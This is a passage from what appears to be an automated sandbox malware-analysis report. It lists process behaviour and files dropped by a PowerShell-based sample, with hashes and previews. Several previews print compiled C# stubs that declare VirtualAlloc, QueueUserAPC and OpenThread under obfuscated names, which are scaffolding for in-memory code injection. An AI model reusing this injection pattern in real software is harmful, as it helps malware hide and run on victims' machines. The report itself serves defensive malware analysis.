                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
10:33:33 | API Interceptor | 6x Sleep call for process: regsvr32.exe modified
10:33:33 | API Interceptor | 11x Sleep call for process: rundll32.exe modified
10:33:46 | API Interceptor | 5x Sleep call for process: loaddll32.exe modified
10:34:20 | API Interceptor | 248x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs


                          Domains


                          ASN


                          JA3 Fingerprints


                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):11606
                          Entropy (8bit):4.883977562702998
                          Encrypted:false
                          SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                          MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                          SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                          SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                          SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                          Malicious:false
                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1192
                          Entropy (8bit):5.325275554903011
                          Encrypted:false
                          SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                          MD5:05CF074042A017A42C1877FC5DB819AB
                          SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                          SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                          SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\RES11BF.tmp
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                          Category:dropped
                          Size (bytes):1328
                          Entropy (8bit):3.9923065968914804
                          Encrypted:false
                          SSDEEP:24:HCe9E26c3tuHrhKdNII+ycuZhNqlcakS7lxPNnq9qd:8c3tuVKdu1ulqaa37Bq9K
                          MD5:27C528436B2B3C05916BE7800A1BDCA3
                          SHA1:26B8F391092F85DDFD9F5820E91C7EEA36070D53
                          SHA-256:608F560F77DFA1AC315ABF79CE35E71EBD5E090F1E1335C5E6B4E38995128647
                          SHA-512:7CF7A7C94D4FEC56DC2145DCDDF6F0AD6BD71835ABCB81F1B90BD6817D12989F2063660385122EA17C8DF758058F975FBC3372A1EC83E8F0F030D8B7CE836EC4
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\RES148E.tmp
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                          Category:dropped
                          Size (bytes):1332
                          Entropy (8bit):4.003514269567322
                          Encrypted:false
                          SSDEEP:24:HdzW9Nv9U8uHvhKdNII+ycuZhNoakS0PNnq92d:01U8upKdu1uloa3Uq9G
                          MD5:29E70867DFDE4F487090ABBBCB2B484F
                          SHA1:31B7F94349888DF87A60D3A792DF85D31460CA2E
                          SHA-256:C9C2C56C48B397FB5BB9ACFDF50E2ED7EFE06542BAE0BEC0A5581231FA63B8F1
                          SHA-512:43BBC13236AD8C9178FA4BD1CCF0179419EAA5FDA7C8A79B59B814557BAD0125F85D9712070021B5C6D9210138C5E3F1894F8B2CED4CBD2BA973FAB72322ADCA
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\RES1B16.tmp
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                          Category:dropped
                          Size (bytes):1328
                          Entropy (8bit):4.001534923476038
                          Encrypted:false
                          SSDEEP:24:HYe9E26qW2KuHrFhKdNII+ycuZhNtakS7PNnq9qd:eqzKuLzKdu1ulta3xq9K
                          MD5:40F552368035B59FB38A94FC74FE0504
                          SHA1:6C04143209198C63E8E2315435BC3EB3B99BB259
                          SHA-256:6EE40A1F274E2A37AE5C850C15BC241463652ED312820B9CCCAEB7BB1C822CF1
                          SHA-512:F45BE36ED243E5F7F0E496EFE5171BAA7FD1BE3A0F83AB01300C05B09AC10D98897679338F4CFB30F25FC5BCB2D2DE34163BD339B79A65E45DCCEE7A21174603
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\RES451.tmp
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                          Category:dropped
                          Size (bytes):1328
                          Entropy (8bit):3.975200179964607
                          Encrypted:false
                          SSDEEP:24:HOe9E26LWbhknZHFhKdNWI+ycuZhN+akS2PNnq9qd:ILtZTKd41ul+a3Kq9K
                          MD5:2997036F1D6399BDEDC49939CBDB26D4
                          SHA1:FBA41FB870A14910B1BC32C973C39C8C80458E93
                          SHA-256:F4A370736333FC785FE73DBD7468D3FF3B2003BE891BDA032A3C2994614A495F
                          SHA-512:D7054F26A09ABB72827D6AA50382AB19950F48954DD8EACE5A7855487516ED0DB28C0BB6AB2C00CB2D740C50D4EDD68B567BE1EA8EDE1B1D17119991413829A9
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ccsd0th.iwn.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zreigz2.4ov.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34kodmfv.oiy.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgdeyylx.qwp.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjo40dyp.crc.psm1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_karhuzep.53l.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnjjoctr.bdk.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview: 1
                          C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):395
                          Entropy (8bit):5.011724479977666
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                          MD5:B1DA1EF961AA0CE50C236459261D955A
                          SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                          SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                          SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                          C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.226640803853184
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fReHW6zxs7+AEszI923fReHWRyA:p37Lvkmb6KzJYW6WZE2JYWRyA
                          MD5:0D4DF55C848FD70C7E467D2A26D53F45
                          SHA1:F4B759DBF60B7BD4760AEEE2865A47EA64FE59BC
                          SHA-256:65AD1A8591B4C85B19C20F7CB6F215675131DC225B6397BAC64CF9BA285E7F6C
                          SHA-512:5855ED3F00032735847AA9F6B55DAD2607E959509E5EDCA111693CC59EBDF9F3C298FB6A39940BC5603C94F8A5D60E97788FCE82E9BE48A955013F8D0C00438A
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs"
                          C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):868
                          Entropy (8bit):5.320286032288214
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzSWbE2SWRy1KaM5DqBVKVrdFAMBJTH:Akka6aSmE2S6y1KxDcVKdBJj
                          MD5:FA46AB7E9BCF97E847F3322DB66934B8
                          SHA1:49552871F35929703C3CD5F33753436E21017849
                          SHA-256:C1CEBB10D75BF73B1B70A7855F8EC4923B79BD07EA173CB98395C0969369AE0F
                          SHA-512:FD5320F3AA7B95C4D9340BAF9358215D08AF44F6A0BEE8A9764E07FA897B4B6FA2E493B87FAF454D1A957B1F95A3CA02854BE2E892471416C046D755BDB8423B
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\CSC7C356A6CF33949CF872753BDA33569A0.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.073206673156649
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyHak7YnqqpQPN5Dlq5J:+RI+ycuZhNYHakSpQPNnqX
                          MD5:5D58A66193F5DD7122F936E757049652
                          SHA1:21888C5F01076812CAB34CA539D7AFF39C3B8C91
                          SHA-256:0735A78CEDD997EA2580034E6867C7010C496B55B3A12DADD449C590F098EDA2
                          SHA-512:5F45E1D4529795A6627FF8BA212FEC06B42F660D23AF9F53AC57AACD0C5D3C51056CC1B2722AD7AA35EC4CDC8C6531A656AEDA2F28501F112037A71522FC3D80
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):395
                          Entropy (8bit):5.011724479977666
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                          MD5:B1DA1EF961AA0CE50C236459261D955A
                          SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                          SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                          SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.151296249516787
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fGYJ/fJrGzxs7+AEszI923fGYJ/fJrb:p37Lvkmb6KzuYJ/fJrGWZE2uYJ/fJrb
                          MD5:C5EAA36B02E3E42DCAC19315987BD2BF
                          SHA1:9E911AD12F0713B3E5C501D19BB86C77472FD22D
                          SHA-256:AA30E86130161DA18E4EB94BB2F46B956D4A23C1359588276525791FED359947
                          SHA-512:1763E1B034A500C4556525E5CCFE1839BC4F342441CC0AD54EEC4F917C0B3ADA905168E8BBFA1447050F154A37F0FBD27945075CB5ADDBEC4A71F41D3C142D5E
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs"
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.5996985608858223
                          Encrypted:false
                          SSDEEP:24:etGS0/W2dg85xyFODuhxkXdWXoWtkZfOnXF+WI+ycuZhNYHakSpQPNnq:6lkb5xykIktWEJOn1l1ulGa3Cq
                          MD5:49B131E65B23D979BA7ED017BA9C7F61
                          SHA1:E4F38CA7AD5EE7CDD3755D0AF594DCE2EBB29035
                          SHA-256:EDAB1CDD86EBBB84944E94F478BFADF9B7704336C65BE2CF7EF74A2691261512
                          SHA-512:45C0B537C27F0694CD6C31481830D1BB220475DD1638B2A19E4635B90D27CD4BCDF3FD44E5165317C78819FB2700969F759254148F7D13E96999F8F2E577FB7D
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):868
                          Entropy (8bit):5.289875059357362
                          Encrypted:false
                          SSDEEP:12:xKIR37Lvkmb6KzuYJ/fJrGWZE2uYJ/fJraKaMK4BFNn5KBZvK2wo8dRSgarZucvs:AId3ka6KzZE2gKaM5DqBVKVrdFAMBJTH
                          MD5:5520D1A07EE800264B0E26905CDD21F1
                          SHA1:AB2EBB2894E8B4D6800436C7D1678737430BB273
                          SHA-256:5658F5CB41F431B1472EEF88932E02DEF879A12362D986DFD847F6E7EEA41DA8
                          SHA-512:7C9DB98B82C608CC22A132923F42F1358B08776A033B012C06BFF2B747C28CB72B1C05C13DFA12DFC4E66A1A2F14F614F74329B0BE67CD2086A92D1B1B4A04F2
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.0739498574927255
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywak7Ynqq2PN5Dlq5J:+RI+ycuZhN+akS2PNnqX
                          MD5:2C961A918364FF38854F8EC54AF4945F
                          SHA1:B0B1AF0532EAC84BAF2E604E3FF19E39D365B473
                          SHA-256:501BAEF967AAD4AB2AA2F5BFC768E871A8E98381C5AA409ADBCA5E31538DF8F1
                          SHA-512:11EB0EDBDBB19470C827A85E25BDD9989476E58B9E6074C91DD38CCEDD5935B7F23D842A1CFE1E852E6044E385DFDEC0C6B65800FFE5F07813171650BA8F48D7
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):414
                          Entropy (8bit):5.049516587690195
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                          MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                          SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                          SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                          SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                          C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.199068343906432
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fjoQ0zxs7+AEszI923fjoG:p37Lvkmb6KzLorWZE2LoG
                          MD5:30EEDF26D86038CE52442382C4102198
                          SHA1:CF34BD8F77949FE161B5776819A519BE39E881D4
                          SHA-256:4FB991BB47038A3CE9017D5F7A9C5AF7437683FB51BD2FD9CE697EF26221ABB7
                          SHA-512:2BC5537B7D3744A654F9E7D7F13A1C1FCA8FD587700BA36940EE021FC814C82C1ED2E07A9296CFF6754E04C199A3830B11B01A8666565CF657157B0CA7BFECC2
                          Malicious:true
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs"
                          C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.634144238857034
                          Encrypted:false
                          SSDEEP:24:etGSM8+mUE7R85z7woel/gNE4/eiDPtkZfjgOTrYu3DZ0WI+ycuZhN+akS2PNnq:62XE7S5gG8iyJjg49ZX1ul+a3Kq
                          MD5:833C125BC415845EE1B8A822DC088C02
                          SHA1:D6A1176ACF053B03DA6D519EAB4EB7017B48A0E8
                          SHA-256:996E609A3921946330E840406C64CD8F7AB162B88504BCE05DCA581E264CD7E3
                          SHA-512:000291790C6E39E5F6D5AA5D4F3C5B2C27C411089C4AA55F7FB26E44B7C00E079F7E9B16F5ECFE20253256C51FF572414ECAA138F75C19A0657B2562733D01B4
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):868
                          Entropy (8bit):5.305483822092941
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzLRE2LIKaM5DqBVKVrdFAMBJTH:Akka6aLRE2LIKxDcVKdBJj
                          MD5:F92374784F54FAECD630C33FDA8432E7
                          SHA1:D7EE4FE021D3E360ABE78C8F6D8F0669ADBB8226
                          SHA-256:6D480811F8E381CACFDB17A10A0FDA08081AF31457C33DD74AE5E466667863C9
                          SHA-512:48ABFF4108A6A3B8D2E38632EF7120BB65D6C0BB124D414B3FFF6B6DF64B914BFD926E3F759B4F05C5CF1598CE47D004E24D77C3A5DD504C74D563D917B61394
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
